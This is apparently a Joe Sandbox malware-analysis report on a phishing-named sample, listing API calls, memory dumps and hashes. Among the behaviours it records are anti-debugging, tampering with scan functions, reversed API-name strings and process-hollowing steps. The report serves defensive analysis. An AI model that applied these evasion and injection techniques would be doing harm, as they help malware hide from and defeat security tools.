• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
• RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
• RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460
• Opcode ID: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
• Instruction ID: 7a2ce530077188beb64fcaa329d42f8f529dd1c126a4d666c34e84e99597f46f
• Opcode Fuzzy Hash: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
• Instruction Fuzzy Hash: CB518771A5025C7AFB35DBA88C46FEFB7ADDB44744FC001E1AB44E6181D7749A448FA0

Control-flow Graph (executed/not-executed colouring of the interactive graph is not reproduced; basic blocks and edges follow)

• 13205: 2b2894c-2b28971 LoadLibraryW -> 13206, 13207
• 13206: 2b28973-2b2898b GetProcAddress -> 13208, 13209
• 13207: 2b289bb-2b289c1
• 13208: 2b289b0-2b289b6 FreeLibrary -> 13207
• 13209: 2b2898d-2b289ac call 2b27d78 -> 13208, 13212
• 13212: 2b289ae -> 13208
APIs
• LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
• Instruction ID: 02ea73879296f6fb652ecd6f8a8c70ed97984c2c0df079b6b8ef83159f43f98d
• Opcode Fuzzy Hash: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
• Instruction Fuzzy Hash: 15F0FFF0AE9314EEE310A668AA49F93B3DCD380790F0089A9F90C87142CE701856AB20

Control-flow Graph (executed/not-executed colouring of the interactive graph is not reproduced; basic blocks and edges follow)

• 13222: 2b2f744-2b2f75e GetModuleHandleW -> 13223, 13224
• 13223: 2b2f760-2b2f772 GetProcAddress -> 13224, 13225
• 13224: 2b2f78a-2b2f792
• 13225: 2b2f774-2b2f784 CheckRemoteDebuggerPresent -> 13224, 13226
• 13226: 2b2f786 -> 13224
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
• Opcode ID: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
• Instruction ID: 362bd32dab411d132a2f7e16cf33f8bd7dadee8321ae1eea48ff71547cdee55a
• Opcode Fuzzy Hash: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
• Instruction Fuzzy Hash: B4F0A770904358BAEB11A6B888887ECFBB99B05328F6447D0A439625E1E7710648CA51

Control-flow Graph

APIs
  • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
• Instruction ID: cb33507f0371fe68966ae60c1350d619d561fbe3f02e67a5a19d6daea7cbe546
• Opcode Fuzzy Hash: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
• Instruction Fuzzy Hash: F821E071A50319BAEB11EBD4CC56FDE77BDEB48700F5044A5B304F7180DA74AA048B64

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
• Instruction ID: 28ddd1e5e8056753ebbe205609be8432b399c9c2c0731bab44ad2b1bc0701bb1
• Opcode Fuzzy Hash: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
• Instruction Fuzzy Hash: CD413975B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55

Control-flow Graph

APIs
  • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                                                                          • Opcode ID: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
                                                                                                                                                                                                                          • Instruction ID: f136d701f76cf2452534bb099dad970d2e84d65eb49685b700266cf4fc268102
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321E071A40319BEEB10EBA0DD56FDEB7BDEB04B00F5144A1B604F71D0DBB4AA048A64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                          • API String ID: 3130163322-2353454454
                                                                                                                                                                                                                          • Opcode ID: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                                                                                                                          • Instruction ID: b4156115f14dee8d39c35aa82bb7842d7eaaf1645aaf0c428994067ac26b9ea6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9211E5B2654258AFEB40EFA8DD41F9A77EDEB0C740F5144A0FA08D7250C634FD159B25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                          • Opcode ID: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                                                                                                                          • Instruction ID: d23e4f91fa0960da7e273cc3fe5a9162521a241682b36118c561ac0a532a118c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1116DB5654308BFEB00EFA4DC41EAEB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                          • Opcode ID: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                                                                                                                          • Instruction ID: 8388146c6a95389dc2769de29c0f941351b9eb95c78c470c125d64e1f822c128
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D116DB5654308BFEB00EFA4DC41E9EB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2521977463-737317276
• Opcode ID: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
• Instruction ID: 4416821152efddc7df5757196051053e39fe12a0bcaf38e925373375cc6836f0
• Opcode Fuzzy Hash: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
• Instruction Fuzzy Hash: 5E0140B5644318BFEB00EFA4DC41E9AB7FDEB4D700F9184A0F908D7650DA34A9159B64
APIs
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 2719805696-3542721025
• Opcode ID: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
• Instruction ID: ddbd965f134c26a55d869f5fea77957af354fd61dad7dd9a68ceb4cbc746443f
• Opcode Fuzzy Hash: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
• Instruction Fuzzy Hash: 14012DB5654314AFDB00EFA8DC41E5AB7EDEB49700F908890B908D7650DA30AD159B75
APIs
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$SectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 3503870465-2520021413
• Opcode ID: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
• Instruction ID: 49158d26d9311c15c17309da22fd1708ef641e0c56c2a26098a1afc479a9023a
• Opcode Fuzzy Hash: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
